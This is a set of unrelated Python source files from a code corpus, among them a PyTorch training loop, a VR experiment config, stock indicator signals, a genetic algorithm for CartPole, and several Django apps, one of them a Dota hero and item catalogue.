optimizer.step()\n sum_loss = Variable(torch.Tensor([0]))\n for para in parameters:\n para._grad.data.zero_()\n optimizer.zero_grad()\n\n sum_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n####################Update#######################\n\n time1 = time.time()\n print(\"Iteration\", epoch_idx, \"Loss\", sum_loss.data.numpy()[0] / batchSize, \"train Acc: \", float(correct / count) , \"time: \", str(time1 - time0))\n \n acc = 1#test(validationSet)\n if acc > maxacc:\n currentResult = resultOutput + \"result_\" + str(epoch_idx) + \".txt\"\n resultStream = open(currentResult, 'w')\n probPath = resultOutput + \"prob_\" + str(epoch_idx) + \".txt\"\n test(testset, resultStream, probPath)\n resultStream.close()\n \n p, r, f = prf(currentResult, goldPath)\n if p == 0 and r == 0 and f == 0:\n continue\n\n if p >= maxp:\n maxp = p\n torch.save(parameters, \"./mulInstacemodel_p\")\n if r >= maxr:\n maxr = r\n torch.save(parameters, \"./mulInstacemodel_r\")\n if f >= maxf:\n maxf = f\n torch.save(parameters, \"./mulInstacemodel_f\")\n","sub_path":"model/GRU_mulInstance_relation.py","file_name":"GRU_mulInstance_relation.py","file_ext":"py","file_size_in_byte":12538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519707741","text":"# Object experiment\n\nfrom Experiments.VR import *\nfrom Behavior import *\nfrom Stimuli.VROdors import *\nfrom utils.Generator import *\n\n\nconditions = []\n\n# define session parameters\nsession_params = {\n 'trial_selection' : 'fixed',\n 'reward' : 'water',\n 'noresponse_intertrial' : True,\n 'resp_cond' : 'correct_loc'\n}\n\n# define environment conditions\nkey = {\n 'background_color' : (.01, .01, .01),\n 'ambient_color' : (0.1, 0.1, 0.1, 1),\n 'direct1_color' : (0.7, 0.7, 0.7, 1),\n 'direct1_dir' : (0, -20, 0),\n 'direct2_color' : (0.2, 0.2, 0.2, 1),\n 'direct2_dir' : (180, -20, 0),\n 'init_ready' : 0,\n 'cue_ready' : 100,\n 'delay_ready' : 0,\n 'resp_ready' : 0,\n 'intertrial_duration' : 0,\n 'cue_duration' : 20000,\n 'delay_duration' : 5000,\n 'response_duration' : 4000,\n 'reward_amount' : 8,\n 'reward_duration' : 2000,\n 'punish_duration' : 1000,\n 'obj_dur' : 20000,\n 'obj_delay' : 0,\n 'ready_loc' : [[0,0]],\n 'probe' : 1\n}\n\nnp.random.seed(0)\nconditions += factorize({**key,\n 'difficulty': 1,\n 'obj_id' : 1,\n 'correct_loc': [[0, 0]],\n 'obj_pos_x' : [0,1],\n 'obj_pos_y' : [0,1],\n 'obj_mag' : 0,\n 'obj_rot' : 0,\n 'obj_tilt' : 0,\n 'obj_yaw' : 0,\n 'obj_period': 'Response',\n 'cue_ready' : 0,\n 'response_duration': 240000,\n 'obj_dur' : 0,\n 'touch_area': [[(500,300)]]})\n\nobj_timepoints = 5\nobj_combs = [[1, 1], [1, 1], [2, 2], [2, 2]]\ncorrect_loc = [(-0.25,0),(0.25,0),(0.25,0),(-0.25,0)]\nobj_posX = [[0, -.25], [0, .25], [0, .25], [0, -.25]]\nfor idx, obj_comb in enumerate(obj_combs):\n rot_f = lambda: interp(np.random.rand(obj_timepoints) *200)\n conditions += factorize({**key,\n 'difficulty': 2,\n 'obj_id' : [obj_comb],\n 'correct_loc': [correct_loc[idx]],\n 'obj_pos_x' : [obj_posX[idx]],\n 'obj_pos_y' : [[-0.13,-0.13,-0.13]],\n 'obj_mag' : .5,\n 'obj_rot' : [[rot_f(), rot_f()]],\n 'obj_tilt' : 0,\n 'obj_yaw' : 0,\n 'obj_period': [['Cue', 'Response']]})\n\n\n# run experiments\nexp = State()\nexp.setup(logger, VRBehavior, VROdors, session_params, conditions)\nexp.run()\n\n\n","sub_path":"conf/vr_test.py","file_name":"vr_test.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"270385439","text":"# coding=utf-8\n\"\"\"指标根据输入的参数生���的买卖信号的函数\"\"\"\nimport talib\n\n\ndef ma_cross(apply_price, N, n, a1, b1, c1, a2, b2, c2):\n \"\"\"\n 黄金交叉和死亡交叉\n z = MA(N) - MA(n)\n 买入信号:\n 若z[i] >= 0 ,找到最近的j, j b1 * c1 且\n z[i] < min(mz/a1, c1)\n 卖出信号:\n 若z[i] < 0 ,找到最近的j, j=0>z[j], Mz=max(-z[j],-z[j+1], ...,-z[i]), 若mz > b1 * c1 且\n z[i] < min(mz/a1, c1)\n Parameters\n ----------\n apply_price:[array, list], 计算的价格序列\n N:[int], ma的长周期\n n:[int], ma的短周期\n a1:[double]\n b1:[double]\n c1:[double]\n a2:[double]\n b2:[double]\n c2:[double]\n \"\"\"\n long_ma = talib.MA(apply_price, timeperiod=N)\n short_ma = talib.MA(apply_price, timeperiod=n)\n z = long_ma - short_ma\n _signal_pos = []\n index = 2\n\n while index < len(z):\n item = z[index]\n flag = False\n # 买入点\n if item >= 0:\n i = 1\n while (index - i) >= 0:\n if z[index - i - 1] <= 0 < z[index - i]:\n flag = True\n break\n i += 1\n if flag:\n mz = max(z[(index - i):(index + 1)])\n if mz > b1 * c1 and item < min(mz / a1, c1):\n _signal_pos.append((index, -1))\n # 卖出点\n else:\n i = 1\n while (index - i) >= 0:\n if z[index - i - 1] >= 0 > z[index - i]:\n flag = True\n break\n i += 1\n if flag:\n mz = max(map(lambda x: -x, z[(index - i):(index + 1)]))\n if mz > b2 * c2 and item < min(mz / a2, c2):\n _signal_pos.append((index, 1))\n index += 1\n return _signal_pos\n\n\ndef envelope(apply_price, period, uBandWith, lBandWith):\n \"\"\"\n\n Parameters\n ----------\n apply_price:价格序列\n period:ma的周期\n uBandWith:maEnvelope上轨宽度\n lBandWith:maEnvelope下轨宽度\n \"\"\"\n ma = talib.MA(apply_price, timeperiod=period)\n _signal_pos = []\n p1 = ma + uBandWith\n p2 = ma - lBandWith\n for i in range(len(ma)):\n # 买入信号\n if apply_price[i] < p2[i]:\n _signal_pos.append((i, -1))\n continue\n # 卖出信号\n if apply_price[i] > p1[i]:\n _signal_pos.append((i, 1))\n continue\n return _signal_pos\n\n\ndef rsi(apply_price, period, over_buy, over_sell, slope_p, slope_q):\n \"\"\"\n Parameters\n ----------\n apply_price:价格序列\n period:RSI的周期\n over_buy:超过此指认为超买,将下跌\n over_sell:超过此值认为炒卖,将上涨\n slope_p:rsi超过炒买值后,从超买值点开始画一条斜线,该线的斜率为slope_p\n slope_q:rsi超过炒卖值后,从超买值点开始画一条斜线,该线的斜率为slope_q\n \"\"\"\n rsi = talib.RSI(apply_price, timeperiod=period)\n _signal_pos = []\n for index, item in enumerate(rsi):\n # 卖出点:当指标达到超买线,从超买值点开始画一条斜线的斜率小于slope_p\n if item > over_buy:\n zero1 = index\n value1 = item + slope_p * (index - zero1)\n if item < value1:\n _signal_pos.append((index, 1))\n continue\n # 买入点:当指标达到超卖线,从超买值点开始画一条斜线的斜率大于slope_q\n if item < over_sell:\n zero2 = index\n value2 = item - slope_q * (index - zero2)\n if item > value2:\n _signal_pos.append((index, -1))\n continue\n return _signal_pos\n\n\ndef roc(apply_price, long_period, short_period, u_border, l_border, u_band, l_band):\n \"\"\"\n Parameters\n ----------\n apply_price:价格序列\n long_period:长期roc的周期\n short_period:短期roc的周期\n u_border:长期roc的上界\n l_border:长期roc的下界\n u_band:均衡线上轨的宽度\n l_band:均衡线下轨的宽度\n \"\"\"\n long_roc = talib.ROC(apply_price, timeperiod=long_period)\n short_roc = talib.ROC(apply_price, timeperiod=short_period)\n _signal_pos = []\n u_equilibrium = 100 + u_band\n l_equilibrium = 100 - l_band\n\n for index in range(len(apply_price)):\n # 卖出点:当长期ROC大于上界且短期ROC在均衡线附近\n if long_roc[index] > u_border and (l_equilibrium <= short_roc[index] <= u_equilibrium):\n _signal_pos.append((index, 1))\n continue\n # 买入点:当长期ROC小于下界且短期ROC在均衡线附近\n if long_roc[index] < l_border and (l_equilibrium <= short_roc[index] <= u_equilibrium):\n _signal_pos.append((index, -1))\n continue\n return _signal_pos\n\n\ndef 
stochastic_oscillator(time_series, a, b, c, d):\n    \"\"\"Stochastic oscillator indicator\"\"\"\n    _signal_pos = []\n    # TA-Lib's STOCH takes the high, low and close series, in that order\n    _k, _d = talib.STOCH(time_series[\"high\"].values, time_series[\"low\"].values,\n                         time_series[\"close\"].values)\n    for index in range(len(time_series)):\n        if _k[index] > _d[index] and (_k[index] < a and _k[index] - _d[index] < b):\n            _signal_pos.append((index, -1))\n            continue\n        if _k[index] < _d[index] and (_k[index] > c and _d[index] - _k[index] < d):\n            _signal_pos.append((index, 1))\n            continue\n    return _signal_pos\n\n\ndef hammer(time_series, a):\n    hammer_signal = talib.CDLHAMMER(time_series[\"open\"].values, time_series[\"high\"].values,\n                                    time_series[\"low\"].values, time_series[\"close\"].values)\n    return hammer_signal\n\n\n","sub_path":"data_analysis/indicator_analysis/IndicatorSignal.py","file_name":"IndicatorSignal.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"498747205","text":"import random\nimport time\n\nimport neural_net as net\n\nfrom deap import base, creator, tools, algorithms\nimport multiprocessing\n\nimport numpy as np\n\nimport gym\ngym.logger.set_level(40)\n\n# global control vars\npopulation_size = 10\nnum_generations = 5\nmutation_probability = 0.2\nmate_probability = .5\ncurrent_env = 'CartPole-v0'\n\nnet_inputs = 4\nnet_outputs = 2\n# only 1 hidden layer for now\nnum_hidden_nodes = 2\n\n\ndef mutate_individual(individual, indpb=.1):\n    for idx in range(len(individual)):\n        # randomly mutate individual genes\n        if np.random.random(1) < indpb:\n            # randomly decide the mutation\n            decision = float(np.random.random(1))\n\n            rand = float(np.random.random(1))\n\n            # whole new weight\n            if decision < .25:\n                individual[idx] = 2 * rand - 1\n                continue\n            # scale the weight by a random factor\n            if decision < .5:\n                multiplier = rand / 1.5\n                individual[idx] = individual[idx] * multiplier\n                continue\n            if decision < .75:\n                sign = 1\n                # to make this randomly addition or subtraction\n                if np.random.random(1) < .5:\n                    sign = -sign\n                individual[idx] += (rand * sign)\n                continue\n            # otherwise (decision >= .75) flip the sign of the weight\n            individual[idx] = -individual[idx]\n\n    return individual,\n\n\ndef ind_to_np_array(x):\n    return np.array([arr for arr in x])\n\n\ndef create_individual(individual):\n    # net_inputs inputs, net_outputs outputs, num_hidden_nodes nodes in the hidden layer\n    layer1_weights, layer2_weights = net.get_rand_weights(net_inputs, net_outputs, num_hidden_nodes)\n\n    weights = net.flatten(layer1_weights, layer2_weights)\n\n    return individual(x for x in weights)\n\n\n# this will be a loop for an individual's attempt at the game\ndef evaluate_individual(individual, display=False):\n    flat_weights = ind_to_np_array(individual)\n\n    layer1_w, layer2_w = net.un_flatten(net_inputs, num_hidden_nodes, net_outputs, flat_weights)\n\n    # do this to avoid 200 step limit\n    env = gym.make(current_env).env\n    observation = env.reset()\n    fitness = 0\n\n    for t in range(1500):\n        if display:\n            env.render()\n            # print(observation)\n\n        # get observation into np array\n        obs = ind_to_np_array(observation)\n\n        # to gain either top value'd choice (classification) or just value (single output)\n        if net_outputs > 1:\n            # forward propagate based on the observation and store result as a list\n            result = list(net.forward_prop(obs, layer1_w, layer2_w))\n\n            # action agent will take is based on output with max result\n            result = result.index(max(result))\n        else:\n            result = net.forward_prop(obs, layer1_w, layer2_w)\n\n        # take a step\n        observation, reward, done, info = 
env.step(result)\n\n # add reward to agent's fitness\n fitness += reward\n\n if done:\n if display:\n print(\"Episode finished after {} time steps\".format(t + 1))\n break\n return fitness,\n\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\n# define 'individual' to have len(goalString) 'rand_weight' elements ('genes')\ntoolbox.register(\"individual\", create_individual, creator.Individual)\n# define the population to be a list of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n# register the fitness function\ntoolbox.register(\"evaluate\", evaluate_individual)\n# register the crossover function\ntoolbox.register(\"mate\", tools.cxUniform, indpb=.5)\n# register a mutation operator with a probability to flip each gene of 0.05\ntoolbox.register(\"mutate\", mutate_individual)\n# set the selection method to grab the top performers\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\nif __name__ == '__main__':\n # seed the random\n random.seed(int(time.time()))\n np.random.seed(int(time.time()))\n\n # Process Pool of 8 workers\n pool = multiprocessing.Pool(processes=8)\n toolbox.register(\"map\", pool.map)\n\n try:\n # create an initial population of individuals\n pop = toolbox.population(n=population_size)\n hof = tools.HallOfFame(1)\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"std\", np.std)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n\n current_max_fitness = -1e10\n\n # Evolution loop\n while current_max_fitness < 1000:\n pop, book = algorithms.eaSimple(pop, toolbox,\n cxpb=mate_probability, # probability of mating 2 individuals\n mutpb=mutation_probability, # probability of mutating an individual\n ngen=num_generations, # number of generations\n stats=stats, # statistics object\n halloffame=hof) # contains the best individuals\n\n bestInd = hof\n\n current_fitness = float(bestInd[0].fitness.values[0])\n if current_fitness > current_max_fitness:\n current_max_fitness = current_fitness\n print(\"Current max fitness: {0}\".format(current_max_fitness))\n evaluate_individual(bestInd[0], True)\n\n print(\"Current max fitness: {0}\".format(current_max_fitness))\n # always close the thread pool\n finally:\n one, two = net.un_flatten(net_inputs, num_hidden_nodes, net_outputs, ind_to_np_array(bestInd[0]))\n print('\\nThe weights of the best individual')\n print(one)\n print(two)\n pool.close()\n\n print(\"-- End of evolution --\")\n","sub_path":"GeneticAlg_CartPole/genetic_driver.py","file_name":"genetic_driver.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193540722","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom app.arquivo.models import Arquivo\nfrom app.repositorio.models import Repositorio\nfrom app.ciclo_arquivo.models import *\nfrom app.logs.models import Log\nfrom random import randint\n\n\n# Create your views here.\ndef arquivo(request):\n \n if request.method == 'POST':\n if \"modified_arquivo\" in request.POST:\n\n arquivo = Arquivo.objects.get(id=request.POST.get(\"arquivo_id\"))\n \n ciclo_arquivo_modified = Modified.objects.create(\n arquivo = arquivo,\n alteracoes = request.POST.get(\"modified_arquivo\")\n )\n\n 
Untracked.objects.get(arquivo_id=request.POST.get(\"arquivo_id\")).delete()\n Unmodified.objects.get(arquivo_id=request.POST.get(\"arquivo_id\")).delete()\n\n return redirect('arquivo')\n \n elif \"arquivo_id_confirmacao\" in request.POST:\n \n arquivo_modified = Modified.objects.get(arquivo_id=request.POST.get(\"arquivo_id_confirmacao\"))\n arquivo = Arquivo.objects.get(id=arquivo_modified.arquivo_id)\n \n Staged.objects.create(\n arquivo=arquivo,\n commit=request.POST.get(\"commit\")\n )\n ciclo_arquivo_modified = Modified.objects.get(arquivo_id=request.POST.get(\"arquivo_id_confirmacao\")).delete()\n return redirect('arquivo')\n\n \n elif \"arquivo_id_git_push\" in request.POST:\n\n arquivo = Staged.objects.get(arquivo_id=request.POST.get(\"arquivo_id_git_push\"))\n repositorio = Repositorio.objects.get(id=1)\n \n Log.objects.create(\n repositorio = repositorio,\n commit = arquivo.commit,\n rasch = randint(0,100000)\n )\n\n Staged.objects.get(arquivo_id=request.POST.get(\"arquivo_id_git_push\")).delete()\n\n return redirect('arquivo') \n\n elif \"arquivo_id_git_add\" in request.POST:\n\n arquivo_id = Arquivo.objects.get(id=request.POST.get(\"arquivo_id_git_add\"))\n\n cliclo_arquivo_untracked = Untracked.objects.create(\n arquivo=arquivo_id\n )\n\n cliclo_arquivo_unmodified = Unmodified.objects.create(\n arquivo=arquivo_id\n )\n\n Arquivo.objects.filter(id=request.POST.get(\"arquivo_id_git_add\")).update(status = False)\n\n return redirect('arquivo')\n \n else:\n \n repositorio = Repositorio.objects.get(id=request.session['nome'])\n \n arquivo = Arquivo.objects.create(\n repositorio_usuario = repositorio,\n nome = request.POST.get(\"nome-arquivo\")\n )\n \n # arquivo_id = Arquivo.objects.get(nome=request.POST.get(\"nome-arquivo\"))\n\n # cliclo_arquivo_untracked = Untracked.objects.create(\n # arquivo=arquivo_id\n # )\n\n # cliclo_arquivo_unmodified = Unmodified.objects.create(\n # arquivo=arquivo_id\n # )\n\n return redirect('arquivo')\n\n\n elif request.method == 'GET':\n \n request.session['nome'] = request.GET.get(\"repositorio\")\n # arquivo_repositorio_usuario_id=request.session['nome']\n arquivos = Arquivo.objects.filter(status=True)\n untracked = Untracked.objects.all()\n unmodified = Unmodified.objects.all()\n modified = Modified.objects.all()\n staged = Staged.objects.all()\n \n dados = {\n \"untracked\": untracked,\n \"unmodified\": unmodified,\n \"modified\": modified,\n \"staged\": staged,\n \"arquivos\": arquivos\n }\n\n \n return render(request, 'arquivo.html', dados)","sub_path":"app/arquivo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"391453875","text":"from status import Status, UserHistory\nfrom permissions import permission_required\nfrom exceptions import UserError\n\n\nclass User:\n\n def __init__(self, name, status, current_disease=None,\n medical_treatment = None):\n self.name = name\n self.status = Status(status, current_disease, medical_treatment)\n self._permissions = []\n self.group = None\n self.history = UserHistory(self)\n\n # getting permissions from group\n def _set_permissions(self, group_permissions):\n self._permissions = group_permissions\n\n # Usually there'll be no need because\n # permissions are got from func _get_permissions()\n def _set_group(self, group):\n self.group = group\n\n\n @staticmethod\n def create_user(user_type, name, status):\n if user_type == 'Patient':\n return Patient(name, status)\n elif 
user_type == 'Doctor':\n return Doctor(name, status)\n else:\n raise UserError(f\"There\\'s no user type {user_type}\")\n\n\nclass Patient(User):\n\n def set_status(self, new_status):\n if new_status == 'Ok' and self.status != 'Ok': # if user recovers after disease\n self.history.write_history(self.status)\n self.status = new_status\n\n\nclass Doctor(User):\n\n @permission_required('CHANGE_STATUS')\n def change_status(self, patient, new_status):\n patient.set_status(new_status)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"MedLogic/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600784259","text":"# stdlib imports\nimport os.path\nimport json\n\n# third party imports\nimport numpy as np\nimport pandas as pd\nimport h5py\nfrom impactutils.io.smcontainers import ShakeMapOutputContainer\n\n# local imports\nfrom .base import CoreModule, Contents\nfrom shakemap.utils.config import get_config_paths\n\n\nclass PointCSVModule(CoreModule):\n \"\"\"\n info -- Extract point data from shake_result.hdf and write as CSV file.\n \"\"\"\n\n command_name = 'pointcsv'\n targets = [r'products/points\\.csv']\n dependencies = [('products/shake_result.hdf', True)]\n\n def __init__(self, eventid):\n super(PointCSVModule, self).__init__(eventid)\n self.contents = Contents(None, None, eventid)\n\n def execute(self):\n \"\"\"\n Write points.csv data file from a \"points\" run of ShakeMap.\n\n Raises:\n NotADirectoryError: When the event data directory does not exist.\n FileNotFoundError: When the the shake_result HDF file does not\n exist.\n \"\"\"\n install_path, data_path = get_config_paths()\n datadir = os.path.join(data_path, self._eventid, 'current', 'products')\n if not os.path.isdir(datadir):\n raise NotADirectoryError('%s is not a valid directory.' % datadir)\n datafile = os.path.join(datadir, 'shake_result.hdf')\n if not os.path.isfile(datafile):\n raise FileNotFoundError('%s does not exist.' 
% datafile)\n fileobj = h5py.File(datafile, 'r')\n rows = {}\n arrays = fileobj['arrays']['imts']['GREATER_OF_TWO_HORIZONTAL']\n ids = list(arrays['MMI']['ids'][()])\n ids = [id.decode('utf8') for id in ids]\n rows['id'] = ids\n rows['lat'] = arrays['MMI']['lats'][()]\n rows['lon'] = arrays['MMI']['lons'][()]\n\n for imt, array in arrays.items():\n mean_column = array['mean'][()]\n std_column = array['std'][()]\n mean_col = f'{imt}_mean'\n std_col = f'{imt}_std'\n rows[mean_col] = mean_column\n rows[std_col] = std_column\n\n dataframe = pd.DataFrame(rows)\n outfile = os.path.join(datadir, 'points.csv')\n dataframe.to_csv(outfile, index=False)\n\n cap = 'ShakeMap points results in CSV format.'\n self.contents.addFile('supplementalInformation',\n 'Supplemental Information', cap,\n 'points.csv', 'application/text')\n","sub_path":"shakemap/coremods/pointcsv.py","file_name":"pointcsv.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"223676523","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Hero, Set, Item\nfrom decimal import *\nfrom operator import itemgetter\nimport json\nfrom collections import OrderedDict\nimport json\nimport tests\n# Create your views here.\n\ndef home(request):\n\t# Display home page\n\treturn render(request, \"home.html\", {})\n\ndef about(request):\n\t# Display about page\n\treturn render(request, \"about.html\", {})\n\ndef heroes(request):\n\t'''\n\t# Build hero database\n\twith open('herodigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\tfor hero_name in data:\n\t\t_hero_name = hero_name.replace(\" \", \"_\").lower()\n\t\thero_data = data[hero_name]\n\n\t\t# Create hero entry\n\t\th = Hero.objects.get_or_create(\n\t\t\tname=_hero_name,\n\t\t\thero_type=hero_data['primary'],\n\t\t\tdescription=hero_data['lore'],\n\t\t\tstrength=hero_data['strength'],\n\t\t\tagility=hero_data['agility'],\n\t\t\tintelligence=hero_data['intelligence'] )\n\t'''\n\n\t# Query all heroes\n\tall_heroes = Hero.objects.all()\n\n\t# Build a list of hero dictionaries\n\theroes = []\n\tfor hero in all_heroes:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"type\" : hero.hero_type,\n\t\t\t\"strength\" : hero.strength,\n\t\t\t\"agility\" : hero.agility,\n\t\t\t\"intelligence\" : hero.intelligence }\n\t\theroes.append(d)\n\n\tcontext = {\"queryset\": heroes}\n\n\treturn render(request, \"heroes.html\", context)\n\t\ndef heroesAPI(request):\n\t# Query all heroes\n\tall_heroes = Hero.objects.all()\n\n\t# Build a list of hero dictionaries\n\theroes = []\n\tfor hero in all_heroes:\n\t\td = OrderedDict()\n\t\td['name'] = hero.name.replace(\"_\", \" \").title()\n\t\td['type'] = hero.hero_type\n\t\td['strength'] = hero.strength\n\t\td['agility'] = hero.agility\n\t\td['intelligence'] = hero.intelligence\n\t\theroes.append(d)\n\n\tsorted_heroes = sorted(heroes, key=lambda k: k[\"name\"])\n\treturn HttpResponse(json.dumps(sorted_heroes), content_type=\"application/json\")\n\ndef items(request):\n\t\"\"\"\n\t# Build item database\n\tItem.objects.all().delete()\n\n\twith open('itemdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\t\t\n\tset_data = open('setdigest.json')\n\tdata2 = json.load(set_data)\n\tfor item in data:\n\t\titem_data = data[item]\n\n\t\t# Assign item attributes\n\t\titem_slot = item_data['slot']\n\t\titem_rarity = item_data['rarity'].title()\n\t\titem_set = 
data2[item_data['item_set']]['legiblename'].replace(\" \", \"_\").lower()\n\t\titem_name = item_data['name'].replace(\" \", \"_\").lower()\n\t\titem_hero = item_data['hero'].replace(\"npc_dota_hero_\", \"\")\n\t\titem_image_url = \"\"\n\n\t\t# Create item entry\n\t\ti = Item.objects.get_or_create(\n\t\t\tname=item_name,\n\t\t\tslot=item_slot,\n\t\t\trarity=item_rarity,\n\t\t\titem_set=item_set,\n\t\t\thero=item_hero,\n\t\t\timage_url=item_image_url\n\t\t)\n\t\n\t# Queen Of Pain name fix\n\titems = list(Item.objects.filter(hero__exact=\"queenofpain\"))\n\tfor item in items:\n\t\titem.hero=\"queen_of_pain\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"centaur\"))\n\tfor item in items:\n\t\titem.hero=\"centaur_warrunner\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"windrunner\"))\n\tfor item in items:\n\t\titem.hero=\"windranger\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"antimage\"))\n\tfor item in items:\n\t\titem.hero=\"anti-mage\"\n\t\titem.save()\n\titems = list(Item.objects.filter(hero__exact=\"skeleton_king\"))\n\tfor item in items:\n\t\titem.hero=\"wraith_king\"\n\t\titem.save()\n\n\t# Update item image urls\n\twith open('itemdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\timage_url_json = open('itemimages.json')\n\titem_image_data = json.load(image_url_json)\n\tfor item in data:\n\t\titem_object = data[item]\n\t\tif (item_object != None):\n\t\t\t_item = Item.objects.get(name__exact=data[item]['name'].replace(\" \", \"_\").lower())\n\t\t\tset_match = item_image_data.get(item, None)\n\t\t\tif (set_match != None):\n\t\t\t\titem_image_url = item_image_data[item]['imageurl']\n\t\t\t\t_item.image_url= item_image_url\n\t\t\t\t_item.save()\n\t\"\"\"\n\n\t# Query all items\n\tall_items = Item.objects.all()\n\n\t# Build a list of item dictionaries\n\titems = []\n\tfor item in all_items:\n\t\td = {\n\t\t\t\"name\" : item.name.replace(\"_\", \" \").title(),\n\t\t\t\"slot\" : item.slot.replace(\"_\", \" \").title(),\n\t\t\t\"rarity\" : item.rarity,\n\t\t\t\"item_set\" : item.item_set.replace(\"_\", \" \").title(),\n\t\t\t\"hero\" : item.hero.replace(\"_\", \" \").title() }\n\n\t\titems.append(d)\n\n\tcontext = {\"queryset\": items}\n\n\treturn render(request, \"items.html\", context)\n\ndef itemsAPI(request):\n\t# Query all items\n\tall_items = Item.objects.all()\n\n\t# Build a list of item dictionaries\n\titems = []\n\tfor item in all_items:\n\t\td = OrderedDict()\n\t\td['name'] = item.name.replace(\"_\", \" \").title()\n\t\td['slot'] = item.slot.replace(\"_\", \" \").title()\n\t\t#d['price'] = item.price\n\t\td['rarity'] = item.rarity\n\t\td['item_set'] = item.item_set.replace(\"_\", \" \").title()\n\t\td['hero'] = item.hero.replace(\"_\", \" \").title()\n\t\titems.append(d)\n\n\tsorted_items = sorted(items, key= lambda k: k[\"name\"])\n\n\treturn HttpResponse(json.dumps(sorted_items), content_type=\"application/json\")\n\n\ndef sets(request):\n\t\"\"\"\n\t# Build set database\n\tSet.objects.all().delete()\n\n\twith open('setdigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\tfor set in data:\n\t\tset_data = data[set];\n\t\t\n\t\tset_name = set_data['legiblename'].replace(\" \", \"_\").lower()\n\t\tset_hero = set_data['hero'].replace('npc_dota_hero_', '')\n\t\tset_rarity = set_data['rarity'].title()\n\t\tset_creation_date = set_data['date']\n\t\tnum_pieces = len(set_data['items'])\n\t\tset_image_url = set_data['imageurl']\n\n\t\t# Create set entry\n\t\ts = 
Set.objects.get_or_create(\n\t\t\tname=set_name,\n\t\t\thero=set_hero,\n\t\t\trarity=set_rarity,\n\t\t\tpieces=num_pieces,\n\t\t\tcreation_date=set_creation_date,\n\t\t\timage_url=set_image_url )\n\t\n\titems = list(Set.objects.filter(hero__exact=\"centaur\"))\n\tfor item in items:\n\t\titem.hero=\"centaur_warrunner\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"windrunner\"))\n\tfor item in items:\n\t\titem.hero=\"windranger\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"antimage\"))\n\tfor item in items:\n\t\titem.hero=\"anti-mage\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"skeleton_king\"))\n\tfor item in items:\n\t\titem.hero=\"wraith_king\"\n\t\titem.save()\n\titems = list(Set.objects.filter(hero__exact=\"queenofpain\"))\n\tfor item in items:\n\t\titem.hero=\"queen_of_pain\"\n\t\titem.save()\n\t\"\"\"\n\t\n\t# Query all sets\n\tall_sets = Set.objects.all()\n\n\t# Build a list of item set dictionaries\n\tsets = []\n\tfor hero_set in all_sets:\n\t\td = {\n\t\t\t\"name\" : hero_set.name.replace(\"_\", \" \").title(),\n\t\t\t\"creation_date\" : hero_set.creation_date,\n\t\t\t\"rarity\" : hero_set.rarity,\n\t\t\t\"pieces\" : hero_set.pieces,\n\t\t\t\"hero\" : hero_set.hero.replace(\"_\", \" \").title(),\n\t\t\t\"image_url\" : hero_set.image_url }\n\n\t\tsets.append(d)\n\n\tcontext = {\"queryset\": sets}\n\n\treturn render(request, \"sets.html\", context)\n\ndef setsAPI(request):\n\t# Query all sets\n\tall_sets = Set.objects.all()\n\n\t# Build a list of item set dictionaries\n\tsets = []\n\tfor hero_set in all_sets:\n\t\td = OrderedDict()\n\t\td['name'] = hero_set.name.replace(\"_\", \" \").title()\n\t\t#d['price'] = hero_set.price\n\t\td['rarity'] = hero_set.rarity\n\t\td['pieces'] = hero_set.pieces\n\t\td['hero'] = hero_set.hero.replace(\"_\", \" \").title()\n\t\tsets.append(d)\n\n\tsorted_sets = sorted(sets, key= lambda k: k[\"name\"])\n\n\treturn HttpResponse(json.dumps(sorted_sets), content_type=\"application/json\")\n\ndef hero(request):\n\t# Get hero name parameter\n\thero_name = request.GET.get('name')\n\n\t# Query a single hero using hero name\n\thero = Hero.objects.get(name__exact=hero_name)\n\n\t# Get all sets and all items that belong to this hero\n\tsets = Set.objects.filter(hero__exact=hero_name)\n\titems = Item.objects.filter(hero__exact=hero_name)\n\n\t# Create hero dictionary\n\tcontext = {\n\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\"description\" : hero.description,\n\t\t\"hero_type\" : hero.hero_type,\n\t\t\"strength\" : hero.strength,\n\t\t\"agility\" : hero.agility, \n\t\t\"intelligence\" : hero.intelligence,\n\t\t\"sets\" : sets,\n\t\t\"items\" : items }\n\n\treturn render(request, \"hero.html\", 